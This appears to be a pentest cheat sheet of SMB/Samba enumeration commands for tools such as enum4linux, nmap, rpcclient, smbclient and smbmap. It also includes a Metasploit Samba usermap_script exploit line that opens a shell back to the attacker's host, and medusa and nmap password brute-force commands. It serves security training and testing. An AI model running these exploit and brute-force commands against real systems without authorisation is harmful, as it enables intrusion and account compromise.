This article only lists the relevant tools and their common usage; learn the detailed tutorials and command options for each tool on your own.
The following eleven enumeration approaches are listed by tool:
1. enum
enum -s <target_ip>
enum -U <target_ip>
enum -P <target_ip>
2. enum4linux
enum4linux -n <target_ip>
enum4linux -a <target_ip>
3. Metasploit
msfconsole; use auxiliary/scanner/smb/smb_version
msf> resource smb_checks.rc
Or
msfconsole -r /usr/share/metasploit-framework/scripts/resource/smb_checks.rc
msf> resource smb_validate.rc
Or
msfconsole -r /usr/share/metasploit-framework/scripts/resource/smb_validate.rc
msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
4. ngrep
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L //<target_ip>
5. nmap / medusa
nmap --script="smb-enum*" --script-args=unsafe=1 -T5 <target_ip>
nmap --script smb-enum-shares -p139,445 -T4 -Pn <target_ip>
nmap --script "smb-vuln*" -p139,445 -T4 -Pn <target_ip>
After enumerating users, logins can be brute-forced:
medusa -h <target_ip> -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt <target_ip> -vvvv
nmap --script smb-brute <target_ip>
6. nmblookup
nmblookup -A <target_ip>
7. rpcclient
rpcclient -U "" -N $ip
rpcclient -U "" <target_ip>
rpcclient -U "" -N <target_ip>
8. samrdump.py
Tool path: /usr/share/doc/python3-impacket/examples/samrdump.py
python3 samrdump.py <target_ip>
9. smbclient
echo exit | smbclient -L //$ip
smbclient -L //<target_ip> -N
smbclient //<target_ip>/IPC$ -N
smbclient //$ip/<share> -U <username>
smbclient //<target_ip>/<share>
smbclient '\\<target_ip>\<share>'
smbclient "//<target_ip>/<share name with spaces>"
10. smbmap
smbmap -H <target_ip> -R <sharename>
smbmap -H <target_ip>
11. smbver script
smbver.sh <target_ip>
smbver script location:
https://github.com/rewardone/OSCPRepo/blob/master/scripts/recon_enum/smbver.sh